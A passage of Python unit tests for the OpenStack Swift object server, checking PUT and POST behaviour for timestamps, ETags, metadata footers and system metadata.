headers={'X-Timestamp': old_timestamp.normal,
'Content-Length': '0',
'Content-Type': 'application/octet-stream'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': new_timestamp.normal,
'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'})
req.body = 'VERIFY TWO'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
new_timestamp.internal + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY TWO')
self.assertEqual(
diskfile.read_metadata(objfile),
{'X-Timestamp': new_timestamp.internal,
'Content-Length': '10',
'ETag': 'b381a4c5dab1eaa1eb9711fa647cd039',
'Content-Type': 'text/plain',
'name': '/a/c/o',
'Content-Encoding': 'gzip'})
def test_PUT_overwrite_to_newer_ts_failed(self):
old_timestamp = next(self.ts)
new_timestamp = next(self.ts)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': new_timestamp.normal,
'Content-Length': '0',
'Content-Type': 'application/octet-stream'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': old_timestamp.normal,
'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'})
req.body = 'VERIFY TWO'
with mock.patch(
'swift.obj.diskfile.BaseDiskFile.create') as mock_create:
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(mock_create.call_count, 0)
# data file doesn't exist there (This is sanity because
# if .data written unexpectedly, it will be removed
# by cleanup_ondisk_files)
datafile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
old_timestamp.internal + '.data')
self.assertFalse(os.path.exists(datafile))
# ts file sitll exists
tsfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
new_timestamp.internal + '.ts')
self.assertTrue(os.path.isfile(tsfile))
def test_PUT_overwrite_w_delete_at(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'X-Delete-At': 9999999999,
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'})
req.body = 'VERIFY TWO'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY TWO')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': utils.Timestamp(timestamp).internal,
'Content-Length': '10',
'ETag': 'b381a4c5dab1eaa1eb9711fa647cd039',
'Content-Type': 'text/plain',
'name': '/a/c/o',
'Content-Encoding': 'gzip'})
def test_PUT_old_timestamp(self):
ts = time()
orig_timestamp = utils.Timestamp(ts).internal
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': orig_timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(ts),
'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'})
req.body = 'VERIFY TWO'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(ts - 1),
'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'})
req.body = 'VERIFY THREE'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
def test_PUT_new_object_really_old_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '-1', # 1969-12-31 23:59:59
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '1', # 1970-01-01 00:00:01
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_object_really_new_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '9999999999', # 2286-11-20 17:46:40
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# roll over to 11 digits before the decimal
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '10000000000',
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_no_etag(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'text/plain'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_invalid_etag(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'text/plain',
'ETag': 'invalid'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 422)
def test_PUT_user_metadata(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'ETag': 'b114ab7b90d9ccac4bd5d99cc7ebb568',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY THREE'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY THREE')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': utils.Timestamp(timestamp).internal,
'Content-Length': '12',
'ETag': 'b114ab7b90d9ccac4bd5d99cc7ebb568',
'Content-Type': 'text/plain',
'name': '/a/c/o',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
def test_PUT_etag_in_footer(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'Etag': 'other-etag',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
obj_etag = md5("obj data").hexdigest()
footer_meta = json.dumps({"Etag": obj_etag})
footer_meta_cksum = md5(footer_meta).hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"obj data",
"--boundary",
"Content-MD5: " + footer_meta_cksum,
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.etag, obj_etag)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
with open(objfile) as fh:
self.assertEqual(fh.read(), "obj data")
def _check_container_override_etag_preference(self, override_headers,
override_footers):
def mock_container_update(ctlr, op, account, container, obj, req,
headers_out, objdevice, policy):
calls_made.append((headers_out, policy))
calls_made = []
ts_put = next(self.ts)
headers = {
'X-Timestamp': ts_put.internal,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'Etag': 'other-etag',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'}
headers.update(override_headers)
req = Request.blank(
'/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'PUT'})
obj_etag = md5("obj data").hexdigest()
footers = {'Etag': obj_etag}
footers.update(override_footers)
footer_meta = json.dumps(footers)
footer_meta_cksum = md5(footer_meta).hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"obj data",
"--boundary",
"Content-MD5: " + footer_meta_cksum,
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
with mock.patch(
'swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.etag, obj_etag)
self.assertEqual(resp.status_int, 201)
self.assertEqual(1, len(calls_made))
self.assertEqual({
'X-Size': str(len('obj data')),
'X-Etag': 'update-etag',
'X-Content-Type': 'text/plain',
'X-Timestamp': ts_put.internal,
}, calls_made[0][0])
self.assertEqual(POLICIES[0], calls_made[0][1])
def test_override_etag_lone_header_footer(self):
self._check_container_override_etag_preference(
{'X-Backend-Container-Update-Override-Etag': 'update-etag'}, {})
self._check_container_override_etag_preference(
{}, {'X-Backend-Container-Update-Override-Etag': 'update-etag'})
self._check_container_override_etag_preference(
{'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}, {})
self._check_container_override_etag_preference(
{}, {'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}),
def test_override_etag_footer_trumps_header(self):
self._check_container_override_etag_preference(
{'X-Backend-Container-Update-Override-Etag': 'ignored-etag'},
{'X-Backend-Container-Update-Override-Etag': 'update-etag'})
self._check_container_override_etag_preference(
{'X-Object-Sysmeta-Container-Update-Override-Etag':
'ignored-etag'},
{'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'})
def test_override_etag_sysmeta_trumps_backend(self):
self._check_container_override_etag_preference(
{'X-Backend-Container-Update-Override-Etag': 'ignored-etag',
'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}, {})
self._check_container_override_etag_preference(
{}, {'X-Backend-Container-Update-Override-Etag': 'ignored-etag',
'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'})
def test_override_etag_sysmeta_header_trumps_backend_footer(self):
headers = {'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}
footers = {'X-Backend-Container-Update-Override-Etag':
'ignored-etag'}
self._check_container_override_etag_preference(headers, footers)
def test_override_etag_sysmeta_footer_trumps_backend_header(self):
headers = {'X-Backend-Container-Update-Override-Etag':
'ignored-etag'}
footers = {'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}
self._check_container_override_etag_preference(headers, footers)
def test_PUT_etag_in_footer_mismatch(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
footer_meta = json.dumps({"Etag": md5("green").hexdigest()})
footer_meta_cksum = md5(footer_meta).hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"blue",
"--boundary",
"Content-MD5: " + footer_meta_cksum,
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 422)
def test_PUT_meta_in_footer(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'X-Object-Meta-X': 'Z',
'X-Object-Sysmeta-X': 'Z',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
footer_meta = json.dumps({
'X-Object-Meta-X': 'Y',
'X-Object-Sysmeta-X': 'Y',
})
footer_meta_cksum = md5(footer_meta).hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"stuff stuff stuff",
"--boundary",
"Content-MD5: " + footer_meta_cksum,
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp},
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.headers.get('X-Object-Meta-X'), 'Y')
self.assertEqual(resp.headers.get('X-Object-Sysmeta-X'), 'Y')
def test_PUT_missing_footer_checksum(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
footer_meta = json.dumps({"Etag": md5("obj data").hexdigest()})
req.body = "\r\n".join((
"--boundary",
"",
"obj data",
"--boundary",
# no Content-MD5
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_bad_footer_checksum(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
footer_meta = json.dumps({"Etag": md5("obj data").hexdigest()})
bad_footer_meta_cksum = md5(footer_meta + "bad").hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"obj data",
"--boundary",
"Content-MD5: " + bad_footer_meta_cksum,
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 422)
def test_PUT_bad_footer_json(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
footer_meta = "{{{[[{{[{[[{[{[[{{{[{{{{[[{{[{["
footer_meta_cksum = md5(footer_meta).hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"obj data",
"--boundary",
"Content-MD5: " + footer_meta_cksum,
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_extra_mime_docs_ignored(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
footer_meta = json.dumps({'X-Object-Meta-Mint': 'pepper'})
footer_meta_cksum = md5(footer_meta).hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"obj data",
"--boundary",
"Content-MD5: " + footer_meta_cksum,
"",
footer_meta,
"--boundary",
"This-Document-Is-Useless: yes",
"",
"blah blah I take up space",
"--boundary--"
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# swob made this into a StringIO for us
wsgi_input = req.environ['wsgi.input']
self.assertEqual(wsgi_input.tell(), len(wsgi_input.getvalue()))
def test_PUT_user_metadata_no_xattr(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'ETag': 'b114ab7b90d9ccac4bd5d99cc7ebb568',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY THREE'
def mock_get_and_setxattr(*args, **kargs):
error_num = errno.ENOTSUP if hasattr(errno, 'ENOTSUP') else \
errno.EOPNOTSUPP
raise IOError(error_num, 'Operation not supported')
with mock.patch('xattr.getxattr', mock_get_and_setxattr):
with mock.patch('xattr.setxattr', mock_get_and_setxattr):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
def test_PUT_client_timeout(self):
class FakeTimeout(BaseException):
def __enter__(self):
raise self
def __exit__(self, typ, value, tb):
pass
# This is just so the test fails when run on older object server code
# instead of exploding.
if not hasattr(object_server, 'ChunkReadTimeout'):
object_server.ChunkReadTimeout = None
with mock.patch.object(object_server, 'ChunkReadTimeout', FakeTimeout):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Content-Length': '6'})
req.environ['wsgi.input'] = WsgiBytesIO(b'VERIFY')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 408)
def test_PUT_system_metadata(self):
# check that sysmeta is stored in diskfile
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Sysmeta-Two': 'Two',
'X-Object-Transient-Sysmeta-Foo': 'Bar'})
req.body = 'VERIFY SYSMETA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
timestamp + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': timestamp,
'Content-Length': '14',
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'name': '/a/c/o',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Sysmeta-Two': 'Two',
'X-Object-Transient-Sysmeta-Foo': 'Bar'})
def test_PUT_succeeds_with_later_POST(self):
t_put = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put,
'Content-Length': 0,
'Content-Type': 'plain/text'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
t_put2 = next(self.ts).internal
t_post = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t_post})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put2,
'Content-Length': 0,
'Content-Type': 'plain/text'},
)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
obj_dir = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')))
ts_file = os.path.join(obj_dir, t_put2 + '.data')
self.assertTrue(os.path.isfile(ts_file))
meta_file = os.path.join(obj_dir, t_post + '.meta')
self.assertTrue(os.path.isfile(meta_file))
def test_POST_system_metadata(self):
# check that diskfile sysmeta is not changed by a POST
timestamp1 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp1,
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Sysmeta-Two': 'Two'})
req.body = 'VERIFY SYSMETA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp2 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp2,
'X-Object-Meta-1': 'Not One',
'X-Object-Sysmeta-1': 'Not One',
'X-Object-Sysmeta-Two': 'Not Two'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
# original .data file metadata should be unchanged
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
timestamp1 + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': timestamp1,
'Content-Length': '14',
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'name': '/a/c/o',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Sysmeta-Two': 'Two'})
# .meta file metadata should have only user meta items
metafile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
timestamp2 + '.meta')
self.assertTrue(os.path.isfile(metafile))
self.assertEqual(diskfile.read_metadata(metafile),
{'X-Timestamp': timestamp2,
'name': '/a/c/o',
'X-Object-Meta-1': 'Not One'})
def test_POST_then_fetch_content_type(self):
# check that content_type is updated by a POST
timestamp1 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp1,
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'X-Object-Meta-1': 'One'})
req.body = 'VERIFY SYSMETA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp2 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp2,
'X-Object-Meta-1': 'Not One',
'Content-Type': 'text/html'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
# original .data file metadata should be unchanged
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')),
timestamp1 + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': timestamp1,
'Content-Length': '14',
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'name': '/a/c/o',
'X-Object-Meta-1': 'One'})
# .meta file metadata should have updated content-type
metafile_name = encode_timestamps(Timestamp(timestamp2),
Timestamp(timestamp2),
explicit=True)
metafile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')),
metafile_name + '.meta')
self.assertTrue(os.path.isfile(metafile))
self.assertEqual(diskfile.read_metadata(metafile),
{'X-Timestamp': timestamp2,
'name': '/a/c/o',
'Content-Type': 'text/html',
'Content-Type-Timestamp': timestamp2,
'X-Object-Meta-1': 'Not One'})
def check_response(resp):
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.content_length, 14)
self.assertEqual(resp.content_type, 'text/html')
self.assertEqual(resp.headers['content-type'], 'text/html')
self.assertEqual(
resp.headers['last-modified'],
strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp2)))))
self.assertEqual(resp.headers['etag'],
'"1000d172764c9dbc3a5798a67ec5bb76"')
self.assertEqual(resp.headers['x-object-meta-1'], 'Not One')
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
check_response(resp)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
check_response(resp)
def test_POST_transient_sysmeta(self):
# check that diskfile transient system meta is changed by a POST
timestamp1 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp1,
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Transient-Sysmeta-Foo': 'Bar'})
req.body = 'VERIFY SYSMETA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp2 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp2,
'X-Object-Meta-1': 'Not One',
'X-Object-Sysmeta-1': 'Not One',
'X-Object-Transient-Sysmeta-Foo': 'Not Bar'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
# original .data file metadata should be unchanged
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')),
timestamp1 + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
self.assertDictEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': timestamp1,
'Content-Length': '14',
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'name': '/a/c/o',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Transient-Sysmeta-Foo': 'Bar'})
# .meta file metadata should have only user meta items
metafile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')),
timestamp2 + '.meta')
self.assertTrue(os.path.isfile(metafile))
self.assertDictEqual(diskfile.read_metadata(metafile),
{'X-Timestamp': timestamp2,
'name': '/a/c/o',
'X-Object-Meta-1': 'Not One',
'X-Object-Transient-Sysmeta-Foo': 'Not Bar'})
def test_PUT_then_fetch_system_metadata(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Sysmeta-Two': 'Two',
'X-Object-Transient-Sysmeta-Foo': 'Bar'})
req.body = 'VERIFY SYSMETA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def check_response(resp):
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.content_length, 14)
self.assertEqual(resp.content_type, 'text/plain')
self.assertEqual(resp.headers['content-type'], 'text/plain')
self.assertEqual(
resp.headers['last-modified'],
strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
self.assertEqual(resp.headers['etag'],
'"1000d172764c9dbc3a5798a67ec5bb76"')
self.assertEqual(resp.headers['x-object-meta-1'], 'One')
self.assertEqual(resp.headers['x-object-sysmeta-1'], 'One')
self.assertEqual(resp.headers['x-object-sysmeta-two'], 'Two')
self.assertEqual(resp.headers['x-object-transient-sysmeta-foo'],
'Bar')
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
check_response(resp)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
check_response(resp)
def test_PUT_then_POST_then_fetch_system_metadata(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'X-Object-Meta-0': 'deleted by post',
'X-Object-Sysmeta-0': 'Zero',
'X-Object-Transient-Sysmeta-0': 'deleted by post',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Sysmeta-Two': 'Two',
